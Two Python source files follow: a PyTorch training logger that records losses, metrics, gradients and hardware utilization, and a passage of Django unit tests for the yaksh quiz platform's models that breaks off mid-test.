training_tracker.py

import copy
import gzip
import json
import os
import time
from collections import defaultdict
from os.path import isdir, join, dirname, realpath
import threading
import numpy as np
import torch
from torch import nn
from tralo.log import log
import multiprocessing as mp
from tralo.utils import count_parameters, sha1_hash_object, gzip_write
def compute_metrics(base_path, iteration, metric_values, metric_lock, manager, callback, best_score, model):
""" defined as function to support multiprocessing """
output = callback(model)
metrics_str = ' '.join([f'{k}: {v:.5f}' for k, v in output if k not in {'iterations'}])
log.info(f'{iteration}: {metrics_str}')
if output[0][1] > best_score.value:
best_score.value = output[0][1]
weight_file = join(base_path, f'weights.pth') if base_path is not None else None
if weight_file is not None:
torch.save(model.state_dict(), weight_file)
if iteration not in metric_values:
metric_values[iteration] = manager.dict()
metric_values[iteration].update({k: v for k, v in output})
metric_file = join(base_path, f'metrics.json') if base_path is not None else None
if metric_file is not None:
metric_lock.acquire()
with open(metric_file, 'w') as fh:
json.dump({k: v.copy() for k, v in metric_values.items()}, fh)
metric_lock.release()
def plot_losses(filename, iterations, losses):
""" defined as function to support multiprocessing """
import matplotlib.pyplot as plt
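    # matplotlib is imported lazily here so it is only required when loss plots are actually written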
plt.plot(iterations, losses)
plt.savefig(filename)
plt.clf()
class LogUtilization(mp.Process):
def __init__(self, log_file=None, stats=None, interval=0.1, write_interval=10):
mp.Process.__init__(self)
self.log_file = log_file
self.stats = stats
self.interval = interval
# by using mp.Value we allow this variable to be manipulated from outside
self.step_interval = mp.Value("i", int(write_interval / interval))
self.p = None
self.exit = mp.Event()
stats = dict(cpu=[], gpu=[], mem=[], gpu_mem=[], time=[])
if self.stats is None:
self.stats = stats
else:
self.stats.update(**stats)
def run(self):
try:
try:
import pynvml
pynvml.nvmlInit()
dev_id = 0
if 'CUDA_VISIBLE_DEVICES' in os.environ:
if ',' in os.environ['CUDA_VISIBLE_DEVICES']:
                        raise ValueError('Currently utilization tracking is only supported for single devices')
else:
dev_id = int(os.environ['CUDA_VISIBLE_DEVICES'])
gpu_handle = pynvml.nvmlDeviceGetHandleByIndex(dev_id)
except (ImportError, ValueError):
gpu_handle = None
                log.warning('GPU utilization logging disabled. Install pynvml and use a single CUDA device.')
i = 0
t_start = time.time()
while not self.exit.is_set():
time.sleep(self.interval)
self.stats['time'] += [int((time.time() - t_start)*1000)]
try:
import psutil
except ImportError:
psutil = None
if psutil is not None:
self.stats['cpu'] += [psutil.cpu_percent()]
self.stats['mem'] += [psutil.virtual_memory().used]
if gpu_handle is not None:
self.stats['gpu'] += [pynvml.nvmlDeviceGetUtilizationRates(gpu_handle).gpu]
self.stats['gpu_mem'] += [pynvml.nvmlDeviceGetMemoryInfo(gpu_handle).used]
# if a log file is used
if self.log_file is not None and i % self.step_interval.value == (self.step_interval.value - 1):
if self.p is not None:
self.p.join()
self.p = threading.Thread(target=gzip_write, args=(self.log_file, dict(self.stats)))
self.p.start()
i += 1
except KeyboardInterrupt:
self.shutdown()
def shutdown(self):
# self.write()
if self.p is not None:
self.p.join()
self.exit.set()
class TrainingLogger(object):
def __init__(self, log_dir=None, interval=50, model=None, config=None,
metric=None, async_metric=None, grad_weights=None, grad_interval=None,
plot=False, utilization_iters=200, checkpoint_iters=None):
"""
Training logger class.
log_dir: Folder to save logs and weights.
interval: Log interval.
model: Reference to model (optional).
config: Current training configuration.
metric: Tuple of metric function and evaluation interval. The function takes model
as an argument.
        grad_weights: A list of layers from which you want to obtain gradients.
        grad_interval: Interval at which gradients are logged. Defaults to `interval`.
        async_metric: Must be a tuple (callback, interval). The callback must return a list of tuples
                      (metric_name, score). The first tuple of this list is used to define the best
                      weights. Larger scores are considered better.
        plot: Write training plots.
utilization_iters: Number of iterations during which utilization (CPU and GPU) is tracked.
checkpoint_iters: List of iterations at which the weights are saved.
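        Example (illustrative sketch; `model`, `train_step` and `evaluate` are placeholders, not part of this module):
            def evaluate(m):
                # must return a list of (metric_name, score) tuples; the first entry defines the best weights
                return [('accuracy', 0.9)]
            with TrainingLogger(log_dir='run1', interval=50, model=model, metric=(evaluate, 500)) as logger:
                for i in range(10000):
                    loss = train_step(model)
                    logger.iter(i, loss=loss)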
"""
# these values can be changed by attribute access, although this should not be necessary in most cases
self.estimate_duration_iter = 10 # estimate training speed over 10 iterations
self.fixed_iterations = set([2, 5, 10])
self.save_only_trainable_weights = False
self.model = model
self.model_params = {n: m for n, m in self.model.named_parameters()} if self.model is not None else {}
self.plot = plot
self.interval = interval
self.checkpoint_iters = checkpoint_iters
self.grad_interval = interval if grad_interval is None else grad_interval
assert grad_weights is None or self.grad_interval is not None
self.mp_manager = mp.Manager()
if log_dir is None and config is not None:
log_dir = sha1_hash_object(config)[:10]
self.stats = dict(start_time=int(time.time()))
        self.base_path = join('logs', log_dir) if log_dir is not None else None
if self.base_path is not None:
os.makedirs(self.base_path, exist_ok=True)
os.makedirs(join(self.base_path, 'gradients'), exist_ok=True)
if config is not None:
json.dump(config, open(join(self.base_path, 'config.json'), 'w'))
with open(join(self.base_path, 'stats.json'), 'w') as fh:
json.dump(self.stats, fh)
# utilization tracking
if utilization_iters > 0:
self.utilization_iters = utilization_iters
if self.base_path is not None:
self.utilization_process = LogUtilization(log_file=join(self.base_path, 'utilization.json.gz'))
else:
self.utilization_stats = self.mp_manager.dict()
self.utilization_process = LogUtilization(stats=self.utilization_stats)
self.utilization_process.start()
else:
self.utilization_process = None
# gradient tracking
if grad_weights is not None:
            grad_weights = grad_weights if type(grad_weights) in {list, tuple} else [grad_weights]
self.grad_weights = []
self.grad_names = []
for gw in grad_weights:
                # if it is a pair and the first element is a string, assume it is the name
if type(gw) in {list, tuple} and len(gw) == 2 and type(gw[0]) == str:
name = gw[0]
gw = gw[1]
else:
name = 'grad'
# for convenience: transform modules into weights
if isinstance(gw, nn.Module):
if isinstance(gw, (nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d)):
self.grad_weights += [gw.weight, gw.bias]
self.grad_names += [name + '_weight', name + '_bias']
else:
raise ValueError('invalid module type. Provide weights instead.')
elif isinstance(gw, torch.Tensor):
self.grad_weights += [gw]
self.grad_names += [name]
self.gradients = [[] for _ in range(len(self.grad_weights))]
self.gradient_iterations = []
else:
self.grad_weights = None
self.gradients = None
# metrics
self.metric_values = self.mp_manager.dict()
self.metrics_lock = torch.multiprocessing.Lock() # avoid writing from two processes
if metric is not None:
self.metric_callback = metric[0]
self.metric_interval = metric[1]
else:
self.metric_interval = None
if async_metric is not None:
self.async_metric_callback = async_metric[0]
self.async_metric_interval = async_metric[1]
else:
self.async_metric_interval = None
# self.metric_callback_async = metric_callback_async
self.loss_iterations = []
self.losses = []
self.loss_cache = []
self.best_score = self.mp_manager.Value(float, -999)
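        # the first metric returned by the metric callback defines the "best" model;
        # compute_metrics() overwrites weights.pth whenever it improves on best_score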
self.plot_thread = None
self.running_processes = []
self.max_processes = 3
self.time_at_2 = None # tracks time at iteration 2
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
""" automatically stop processes if used in a context manager """
if self.utilization_process is not None:
self.utilization_process.terminate()
self.update_stats()
for p in self.running_processes:
p.join()
def stop(self):
""" explicit stop function """
self.__exit__(None, None, None)
def save_weights(self, only_trainable=False, weight_file='weights.pth'):
""" convenience function to save weights """
if self.model is None:
raise AttributeError('You need to provide a model reference when initializing TrainingTracker to save weights.')
weights_path = join(self.base_path, weight_file)
weight_dict = self.model.state_dict()
if only_trainable:
weight_dict = {n: weight_dict[n] for n, p in self.model.named_parameters() if p.requires_grad}
torch.save(weight_dict, weights_path)
log.info(f'Saved weights to {weights_path}')
def update_stats(self):
self.stats['stop_time'] = int(time.time())
self.stats['iterations'] = int(self.loss_iterations[-1]) if len(self.loss_iterations) > 0 else 0
if self.model:
self.stats['params'] = int(count_parameters(self.model))
self.stats['learn_params'] = int(count_parameters(self.model, only_trainable=True))
try:
with gzip.open(join(self.base_path, 'utilization.json.gz'), 'rb') as fh:
util = json.loads(fh.read())
self.stats['cpu_mean'] = int(np.mean(util['cpu']))
self.stats['gpu_mean'] = int(np.mean(util['gpu']))
self.stats['mem_mean'] = int(np.mean(util['mem']))
self.stats['gpu_mem_mean'] = int(np.mean(util['gpu_mem']))
except BaseException:
pass
if self.base_path is not None:
with open(join(self.base_path, 'stats.json'), 'w') as fh:
json.dump(self.stats, fh)
def launch_async_metric(self, i):
# metrics_path = join(self.base_path, f'metrics.json') if self.base_path is not None else None
if len([1 for p in self.running_processes if p.is_alive()]) > self.max_processes:
log.info('Too many background processes. joining...')
for p in self.running_processes:
p.join()
from torch.multiprocessing import Process
model_copy = copy.deepcopy(self.model).cpu() if self.model is not None else None
p = Process(target=compute_metrics, args=(self.base_path, i, self.metric_values, self.metrics_lock, self.mp_manager,
self.async_metric_callback, self.best_score, model_copy))
p.start()
self.running_processes += [p]
def save_metrics(self, i, **metrics):
if len(metrics) > 0:
this_dict = self.mp_manager.dict()
for metric_name, value in metrics.items():
if callable(value):
value = value()
this_dict[metric_name] = value
if i not in self.metric_values:
self.metric_values[i] = this_dict
else:
self.metric_values[i].update(this_dict)
if self.base_path is not None:
self.metrics_lock.acquire()
with open(join(self.base_path, f'metrics.json'), 'w') as fh:
json.dump({k: v.copy() for k, v in self.metric_values.items()}, fh)
self.metrics_lock.release()
def __call__(self, i, loss=None, **extras):
self.iter(i, loss=loss, **extras)
def iter(self, i, loss=None, **extras):
if self.utilization_process is not None and i >= self.utilization_iters:
            log.info('stopping utilization logging process')
self.utilization_process.terminate()
self.utilization_process = None
if i == 2:
self.time_at_2 = time.time()
if i == 2 + self.estimate_duration_iter:
time_diff = time.time() - self.time_at_2
time_per_iter = time_diff / self.estimate_duration_iter
log.info(f'Speed estimates: {time_per_iter:.3f}s/iter or {time_per_iter*1000/60:.1f}min/1000 iter')
        if i % self.grad_interval == self.grad_interval - 1:
if self.grad_weights is not None:
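                # gradients are stored as 500-bin histograms (one per tracked weight and iteration)
                # instead of raw tensors, to keep memory and disk usage small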
for j, (w, name) in enumerate(zip(self.grad_weights, self.grad_names)):
hist = torch.histc(w.grad.cpu(), bins=500)
if self.base_path is not None:
name = name if name is not None else 'grad'
torch.save(hist, join(self.base_path, f'gradients/{i:08d}-{j}-{name}.pth'))
else:
self.gradients[j] += [hist]
self.gradient_iterations += [i]
if self.checkpoint_iters is not None and i in self.checkpoint_iters:
            self.save_weights(only_trainable=self.save_only_trainable_weights, weight_file=f'weights_{i}.pth')
# normal metrics
if self.metric_interval is not None and i % self.metric_interval == self.metric_interval - 1:
compute_metrics(self.base_path, i, self.metric_values, self.metrics_lock, self.mp_manager, self.metric_callback, self.best_score, self.model)
# async metrics
if self.async_metric_interval is not None and i % self.async_metric_interval == self.async_metric_interval - 1:
self.launch_async_metric(i)
# add extras passed via arguments
loss_str, metrics_str = '', ''
if len(extras) > 0:
self.save_metrics(i, **extras)
if len(self.metric_values) > 0:
metrics_str = ' '.join([f'{k}: {v:.5f}' for k, v in self.metric_values[i].items() if k not in {'iterations'}])
# log.info(f'{i}:{metrics_str}')
if i % self.interval == self.interval - 1 or i in self.fixed_iterations:
if loss is not None:
self.loss_cache += [float(loss)]
current_loss = np.mean(self.loss_cache)
self.loss_cache = []
self.losses += [current_loss]
self.loss_iterations += [i]
if self.base_path is not None:
json.dump({'loss': self.losses, 'iterations': self.loss_iterations},
open(join(self.base_path, 'losses.json'), 'w'))
if self.plot and self.base_path is not None:
                self.plot_thread = threading.Thread(target=plot_losses, args=(self.base_path + '-loss.pdf',
                                                                              self.loss_iterations, self.losses))
                self.plot_thread.start()
if loss is not None:
loss_str = f' loss: {current_loss:.5f}'
log.info(f'{i}:{loss_str} {metrics_str}')
def plots(self):
from tralo.visualize import show_run
gradients = (self.grad_names, self.grad_weights, self.gradient_iterations, self.gradients) if self.gradients is not None else None
if self.base_path is not None:
with gzip.open(join(self.base_path, 'utilization.json.gz'), 'rb') as fh:
util_stats = json.loads(fh.read())
elif hasattr(self, 'utilization_stats'):
util_stats = self.utilization_stats
else:
util_stats = None
show_run(self.base_path, self.metric_values, (self.loss_iterations, self.losses),
gradients, util_stats)
# backward compatibility
TrainingTracker = TrainingLogger

test_models.py

import unittest
from yaksh.models import User, Profile, Question, Quiz, QuestionPaper,\
QuestionSet, AnswerPaper, Answer, Course, StandardTestCase,\
StdIOBasedTestCase, FileUpload, McqTestCase, AssignmentUpload,\
LearningModule, LearningUnit, Lesson, LessonFile, CourseStatus
from yaksh.code_server import (
    ServerPool, get_result as get_result_from_code_server
)
import json
import ruamel.yaml as yaml
from datetime import datetime, timedelta
from django.utils import timezone
import pytz
from django.contrib.auth.models import Group
from django.db import IntegrityError
from django.core.files import File
from django.forms.models import model_to_dict
from textwrap import dedent
import zipfile
import os
import shutil
import tempfile
from threading import Thread
from yaksh import settings
def setUpModule():
# create user profile
user = User.objects.create_user(username='creator',
password='demo',
email='demo@test.com')
User.objects.create_user(username='demo_user2',
password='demo',
email='demo@test.com')
Profile.objects.create(user=user, roll_number=1, institute='IIT',
department='Chemical', position='Student')
student = User.objects.create_user(username='demo_user3',
password='demo',
email='demo3@test.com')
Profile.objects.create(user=student, roll_number=3, institute='IIT',
department='Chemical', position='Student')
user4 = User.objects.create_user(username='demo_user4',
password='demo',
email='demo4@test.com'
)
Profile.objects.create(user=user4, roll_number=4, institute='IIT',
department='Chemical', position='Student')
# create a course
course = Course.objects.create(name="Python Course",
enrollment="Enroll Request", creator=user)
# create 20 questions
for i in range(1, 21):
Question.objects.create(summary='Q%d' % (i), points=1, type='code', user=user)
# create a quiz
quiz = Quiz.objects.create(start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc),
duration=30, active=True,
attempts_allowed=1, time_between_attempts=0,
description='demo quiz 1', pass_criteria=0,
instructions="Demo Instructions")
Quiz.objects.create(start_date_time=datetime(2014, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc),
end_date_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc),
duration=30, active=False,
attempts_allowed=-1, time_between_attempts=0,
description='demo quiz 2', pass_criteria=40,
instructions="Demo Instructions")
tmp_file1 = os.path.join(tempfile.gettempdir(), "test.txt")
with open(tmp_file1, 'wb') as f:
f.write('2'.encode('ascii'))
    # Learning module
learning_module_one = LearningModule.objects.create(name='LM1',
description='module one',
creator=user)
learning_module_two = LearningModule.objects.create(name='LM2',
description='module two',
creator=user,
order=1)
lesson = Lesson.objects.create(name='L1', description='Video Lesson',
creator=user)
learning_unit_lesson = LearningUnit.objects.create(order=1, lesson=lesson,
type='lesson')
learning_unit_quiz = LearningUnit.objects.create(order=2, quiz=quiz,
type='quiz')
learning_module_one.learning_unit.add(learning_unit_lesson)
learning_module_one.learning_unit.add(learning_unit_quiz)
learning_module_one.save()
course.learning_module.add(learning_module_one)
course.learning_module.add(learning_module_two)
course_user = User.objects.create(username='course_user')
course.students.add(course_user)
course.save()
LessonFile.objects.create(lesson=lesson)
CourseStatus.objects.create(course=course, user=course_user)
def tearDownModule():
User.objects.all().delete()
Question.objects.all().delete()
Quiz.objects.all().delete()
Course.objects.all().delete()
QuestionPaper.objects.all().delete()
LessonFile.objects.all().delete()
Lesson.objects.all().delete()
LearningUnit.objects.all().delete()
LearningModule.objects.all().delete()
AnswerPaper.objects.all().delete()
###############################################################################
class LessonTestCases(unittest.TestCase):
def setUp(self):
self.lesson = Lesson.objects.get(name='L1')
self.creator = User.objects.get(username='creator')
def test_lesson(self):
self.assertEqual(self.lesson.name, 'L1')
self.assertEqual(self.lesson.description, 'Video Lesson')
self.assertEqual(self.lesson.creator.username, self.creator.username)
class LearningModuleTestCases(unittest.TestCase):
def setUp(self):
self.learning_module = LearningModule.objects.get(name='LM1')
self.learning_module_two = LearningModule.objects.get(name='LM2')
self.creator = User.objects.get(username='creator')
self.student = User.objects.get(username='course_user')
self.learning_unit_one = LearningUnit.objects.get(order=1)
self.learning_unit_two = LearningUnit.objects.get(order=2)
self.quiz = Quiz.objects.get(description='demo quiz 1')
self.lesson = Lesson.objects.get(name='L1')
self.course = Course.objects.get(name='Python Course')
self.course_status = CourseStatus.objects.get(
course=self.course, user=self.student)
def tearDown(self):
# Remove unit from course status completed units
self.course_status.completed_units.remove(self.learning_unit_one)
self.course_status.completed_units.remove(self.learning_unit_two)
def test_learning_module(self):
self.assertEqual(self.learning_module.description, 'module one')
self.assertEqual(self.learning_module.creator, self.creator)
self.assertTrue(self.learning_module.check_prerequisite)
self.assertEqual(self.learning_module.order, 0)
def test_get_quiz_units(self):
# Given
quizzes = [self.quiz]
# When
module_quizzes = self.learning_module.get_quiz_units()
# Then
self.assertSequenceEqual(module_quizzes, quizzes)
def test_get_learning_units(self):
# Given
learning_units = [self.learning_unit_one, self.learning_unit_two]
# When
module_units = self.learning_module.get_learning_units()
# Then
self.assertSequenceEqual(module_units, learning_units)
def test_get_added_quiz_lesson(self):
# Given
quiz_lessons = [('lesson', self.lesson), ('quiz', self.quiz)]
# When
module_quiz_lesson = self.learning_module.get_added_quiz_lesson()
# Then
self.assertEqual(module_quiz_lesson, quiz_lessons)
def test_toggle_check_prerequisite(self):
self.assertTrue(self.learning_module.check_prerequisite)
# When
self.learning_module.toggle_check_prerequisite()
# Then
self.assertFalse(self.learning_module.check_prerequisite)
# When
self.learning_module.toggle_check_prerequisite()
# Then
self.assertTrue(self.learning_module.check_prerequisite)
def test_get_next_unit(self):
# Given
current_unit_id = self.learning_unit_one.id
next_unit = self.learning_unit_two
# When
unit = self.learning_module.get_next_unit(current_unit_id)
# Then
self.assertEqual(unit, next_unit)
# Given
current_unit_id = self.learning_unit_two.id
next_unit = self.learning_unit_one
# When
unit = self.learning_module.get_next_unit(current_unit_id)
# Then
self.assertEqual(unit, next_unit)
def test_get_module_status(self):
# Given
module_status = 'not attempted'
# When
status = self.learning_module.get_status(self.student, self.course)
# Then
self.assertEqual(status, module_status)
# Module in progress
# Given
self.course_status.completed_units.add(self.learning_unit_one)
# When
status = self.learning_module.get_status(self.student, self.course)
# Then
self.assertEqual("inprogress", status)
# Module is completed
# Given
self.course_status.completed_units.add(self.learning_unit_two)
# When
status = self.learning_module.get_status(self.student, self.course)
# Then
self.assertEqual("completed", status)
# Module with no units
self.course.learning_module.add(self.learning_module_two)
status = self.learning_module_two.get_status(self.student, self.course)
self.assertEqual("no units", status)
def test_module_completion_percent(self):
# for module without learning units
percent = self.learning_module_two.get_module_complete_percent(
self.course, self.student
)
self.assertEqual(percent, 0)
# for module with learning units
self.course_status.completed_units.add(self.learning_unit_one)
self.course_status.completed_units.add(self.learning_unit_two)
percent = self.learning_module.get_module_complete_percent(
self.course, self.student
)
self.assertEqual(percent, 100)
class LearningUnitTestCases(unittest.TestCase):
def setUp(self):
learning_module = LearningModule.objects.get(name='LM1')
self.learning_unit_one = learning_module.learning_unit.get(order=1)
self.learning_unit_two = learning_module.learning_unit.get(order=2)
self.lesson = Lesson.objects.get(name='L1')
self.quiz = Quiz.objects.get(description='demo quiz 1')
def test_learning_unit(self):
self.assertEqual(self.learning_unit_one.type, 'lesson')
self.assertEqual(self.learning_unit_two.type, 'quiz')
self.assertEqual(self.learning_unit_one.lesson, self.lesson)
self.assertEqual(self.learning_unit_two.quiz, self.quiz)
self.assertIsNone(self.learning_unit_one.quiz)
self.assertIsNone(self.learning_unit_two.lesson)
self.assertTrue(self.learning_unit_one.check_prerequisite)
self.assertTrue(self.learning_unit_two.check_prerequisite)
class ProfileTestCases(unittest.TestCase):
def setUp(self):
self.user1 = User.objects.get(username='creator')
self.profile = Profile.objects.get(user=self.user1)
self.user2 = User.objects.get(username='demo_user3')
def test_user_profile(self):
""" Test user profile"""
self.assertEqual(self.user1.username, 'creator')
self.assertEqual(self.profile.user.username, 'creator')
self.assertEqual(int(self.profile.roll_number), 1)
self.assertEqual(self.profile.institute, 'IIT')
self.assertEqual(self.profile.department, 'Chemical')
self.assertEqual(self.profile.position, 'Student')
###############################################################################
class QuestionTestCases(unittest.TestCase):
def setUp(self):
# Single question details
self.user1 = User.objects.get(username="creator")
self.user2 = User.objects.get(username="demo_user2")
self.question1 = Question.objects.create(summary='Demo Python 1',
language='Python',
type='Code',
active=True,
description='Write a function',
points=1.0,
snippet='def myfunc()',
user=self.user1
)
self.question2 = Question.objects.create(summary='Yaml Json',
language='python',
type='code',
active=True,
description='factorial of a no',
points=2.0,
snippet='def fact()',
user=self.user2
)
# create a temp directory and add files for loading questions test
file_path = os.path.join(tempfile.gettempdir(), "test.txt")
self.load_tmp_path = tempfile.mkdtemp()
shutil.copy(file_path, self.load_tmp_path)
file1 = os.path.join(self.load_tmp_path, "test.txt")
# create a temp directory and add files for dumping questions test
self.dump_tmp_path = tempfile.mkdtemp()
shutil.copy(file_path, self.dump_tmp_path)
file2 = os.path.join(self.dump_tmp_path, "test.txt")
upload_file = open(file2, "r")
django_file = File(upload_file)
file = FileUpload.objects.create(file=django_file,
question=self.question2
)
self.question1.tags.add('python', 'function')
self.assertion_testcase = StandardTestCase(question=self.question1,
test_case='assert myfunc(12, 13) == 15',
type='standardtestcase'
)
self.upload_test_case = StandardTestCase(question=self.question2,
test_case='assert fact(3) == 6',
type='standardtestcase'
)
self.upload_test_case.save()
self.user_answer = "demo_answer"
self.test_case_upload_data = [{"test_case": "assert fact(3)==6",
"test_case_type": "standardtestcase",
"test_case_args": "",
"weight": 1.0
}]
questions_data = [{"snippet": "def fact()", "active": True,
"points": 1.0,
"description": "factorial of a no",
"language": "Python", "type": "Code",
"testcase": self.test_case_upload_data,
"files": [[file1, 0]],
"summary": "Yaml Demo",
"tags": ['yaml_demo']
}]
questions_data_with_missing_fields = [{"active": True,
"points": 1.0,
"description":\
"factorial of a no",
"language": "Python",
"type": "Code",
"testcase":\
self.test_case_upload_data,
"summary": "Yaml Demo 2"
}]
self.yaml_questions_data = yaml.safe_dump_all(questions_data)
self.yaml_questions_data_with_missing_fields = yaml.safe_dump_all(
questions_data_with_missing_fields
)
def tearDown(self):
shutil.rmtree(self.load_tmp_path)
shutil.rmtree(self.dump_tmp_path)
uploaded_files = FileUpload.objects.all()
que_id_list = [file.question.id for file in uploaded_files]
for que_id in que_id_list:
dir_path = os.path.join(os.getcwd(), "yaksh", "data",
"question_{0}".format(que_id)
)
if os.path.exists(dir_path):
shutil.rmtree(dir_path)
uploaded_files.delete()
def test_question(self):
""" Test question """
self.assertEqual(self.question1.summary, 'Demo Python 1')
self.assertEqual(self.question1.language, 'Python')
self.assertEqual(self.question1.type, 'Code')
self.assertEqual(self.question1.description, 'Write a function')
self.assertEqual(self.question1.points, 1.0)
self.assertTrue(self.question1.active)
self.assertEqual(self.question1.snippet, 'def myfunc()')
tag_list = []
for tag in self.question1.tags.all():
tag_list.append(tag.name)
for tag in tag_list:
self.assertIn(tag, ['python', 'function'])
def test_dump_questions(self):
""" Test dump questions into Yaml """
question = Question()
question_id = [self.question2.id]
questions_zip = question.dump_questions(question_id, self.user2)
que_file = FileUpload.objects.get(question=self.question2.id)
zip_file = zipfile.ZipFile(questions_zip, "r")
tmp_path = tempfile.mkdtemp()
zip_file.extractall(tmp_path)
test_case = self.question2.get_test_cases()
with open("{0}/questions_dump.yaml".format(tmp_path), "r") as f:
questions = yaml.safe_load_all(f.read())
for q in questions:
self.assertEqual(self.question2.summary, q['summary'])
self.assertEqual(self.question2.language, q['language'])
self.assertEqual(self.question2.type, q['type'])
self.assertEqual(self.question2.description, q['description'])
self.assertEqual(self.question2.points, q['points'])
self.assertTrue(self.question2.active)
self.assertEqual(self.question2.snippet, q['snippet'])
self.assertEqual(os.path.basename(que_file.file.path),
q['files'][0][0])
self.assertEqual([case.get_field_value() for case in test_case],
q['testcase']
)
for file in zip_file.namelist():
os.remove(os.path.join(tmp_path, file))
def test_load_questions_with_all_fields(self):
""" Test load questions into database from Yaml """
question = Question()
result = question.load_questions(self.yaml_questions_data, self.user1)
question_data = Question.objects.get(summary="Yaml Demo")
file = FileUpload.objects.get(question=question_data)
test_case = question_data.get_test_cases()
self.assertEqual(question_data.summary, 'Yaml Demo')
self.assertEqual(question_data.language, 'Python')
self.assertEqual(question_data.type, 'Code')
self.assertEqual(question_data.description, 'factorial of a no')
self.assertEqual(question_data.points, 1.0)
self.assertTrue(question_data.active)
        tags = question_data.tags.all().values_list("name", flat=True)
self.assertListEqual(list(tags), ['yaml_demo'])
self.assertEqual(question_data.snippet, 'def fact()')
self.assertEqual(os.path.basename(file.file.path), "test.txt")
self.assertEqual([case.get_field_value() for case in test_case],
self.test_case_upload_data
)
def test_load_questions_with_missing_fields(self):
""" Test load questions into database from Yaml with
missing fields like files, snippet and tags. """
question = Question()
result = question.load_questions(
self.yaml_questions_data_with_missing_fields,
self.user1
)
question_data = Question.objects.get(summary="Yaml Demo 2")
file = FileUpload.objects.filter(question=question_data)
test_case = question_data.get_test_cases()
        self.assertEqual(question_data.summary, 'Yaml Demo 2')
        self.assertEqual(question_data.language, 'Python')
        self.assertEqual(question_data.type, 'Code')
        self.assertEqual(question_data.description, 'factorial of a no')
        self.assertEqual(question_data.points, 1.0)
        self.assertTrue(question_data.active)
        self.assertEqual(question_data.snippet, '')
        self.assertListEqual(list(file), [])
self.assertEqual([case.get_field_value() for case in test_case],
self.test_case_upload_data
)
        tags = question_data.tags.all().values_list("name", flat=True)
self.assertListEqual(list(tags), [])
###############################################################################
class QuizTestCases(unittest.TestCase):
def setUp(self):
self.course = Course.objects.get(name="Python Course")
self.creator = User.objects.get(username="creator")
self.teacher = User.objects.get(username="demo_user2")
self.student1 = User.objects.get(username='demo_user3')
self.student2 = User.objects.get(username='demo_user4')
self.quiz1 = Quiz.objects.get(description='demo quiz 1')
self.quiz2 = Quiz.objects.get(description='demo quiz 2')
self.quiz3 = Quiz.objects.create(
start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
duration=30, active=True,
attempts_allowed=1, time_between_attempts=0,
description='demo quiz 3', pass_criteria=0,
instructions="Demo Instructions"
)
self.question_paper3 = QuestionPaper.objects.create(quiz=self.quiz3)
self.quiz4 = Quiz.objects.create(
start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
duration=30, active=True,
attempts_allowed=1, time_between_attempts=0,
description='demo quiz 4', pass_criteria=0,
instructions="Demo Instructions"
)
self.answerpaper1 = AnswerPaper.objects.create(
user=self.student1,
question_paper=self.question_paper3,
course=self.course,
attempt_number=1,
start_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_time=datetime(2015, 10, 9, 10, 28, 15, 0, tzinfo=pytz.utc),
passed=True
)
self.answerpaper2 = AnswerPaper.objects.create(
user=self.student2,
question_paper=self.question_paper3,
course=self.course,
attempt_number=1,
start_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_time=datetime(2015, 10, 9, 10, 28, 15, 0, tzinfo=pytz.utc),
passed=False
)
self.trial_course = Course.objects.create_trial_course(self.creator)
def tearDown(self):
self.answerpaper1.delete()
self.answerpaper2.delete()
self.trial_course.delete()
self.quiz3.delete()
self.quiz4.delete()
self.question_paper3.delete()
def test_get_total_students(self):
self.assertEqual(self.quiz3.get_total_students(self.course), 2)
def test_get_total_students_without_questionpaper(self):
self.assertEqual(self.quiz4.get_total_students(self.course), 0)
def test_get_passed_students(self):
self.assertEqual(self.quiz3.get_passed_students(self.course), 1)
def test_get_passed_students_without_questionpaper(self):
self.assertEqual(self.quiz4.get_passed_students(self.course), 0)
def test_get_failed_students(self):
self.assertEqual(self.quiz3.get_failed_students(self.course), 1)
def test_get_failed_students_without_questionpaper(self):
self.assertEqual(self.quiz4.get_failed_students(self.course), 0)
def test_quiz(self):
""" Test Quiz"""
self.assertEqual((self.quiz1.start_date_time).strftime('%Y-%m-%d'),
'2015-10-09')
self.assertEqual((self.quiz1.start_date_time).strftime('%H:%M:%S'),
'10:08:15')
self.assertEqual(self.quiz1.duration, 30)
self.assertTrue(self.quiz1.active)
self.assertEqual(self.quiz1.description, 'demo quiz 1')
self.assertEqual(self.quiz1.pass_criteria, 0)
self.assertEqual(self.quiz1.instructions, "Demo Instructions")
def test_is_expired(self):
self.assertFalse(self.quiz1.is_expired())
self.assertTrue(self.quiz2.is_expired())
def test_get_active_quizzes(self):
quizzes = Quiz.objects.get_active_quizzes()
for quiz in quizzes:
self.assertTrue(quiz.active)
def test_create_trial_quiz(self):
"""Test to check if trial quiz is created"""
trial_quiz = Quiz.objects.create_trial_quiz(self.creator)
self.assertEqual(trial_quiz.duration, 1000)
self.assertEqual(trial_quiz.description, "trial_questions")
self.assertTrue(trial_quiz.is_trial)
self.assertEqual(trial_quiz.time_between_attempts, 0)
def test_create_trial_from_quiz_godmode(self):
"""Test to check if a copy of original quiz is created in godmode"""
trial_quiz = Quiz.objects.create_trial_from_quiz(self.quiz1.id,
self.creator,
True, self.course.id
)[0]
self.assertEqual(trial_quiz.description,
"Trial_orig_id_{}_godmode".format(self.quiz1.id)
)
self.assertTrue(trial_quiz.is_trial)
self.assertEqual(trial_quiz.duration, 1000)
self.assertTrue(trial_quiz.active)
self.assertEqual(trial_quiz.end_date_time,
datetime(2199, 1, 1, 0, 0, 0, 0, tzinfo=pytz.utc)
)
self.assertEqual(trial_quiz.time_between_attempts, 0)
def test_create_trial_from_quiz_usermode(self):
"""Test to check if a copy of original quiz is created in usermode"""
trial_quiz = Quiz.objects.create_trial_from_quiz(self.quiz2.id,
self.creator,
False, self.course.id
)[0]
self.assertEqual(trial_quiz.description,
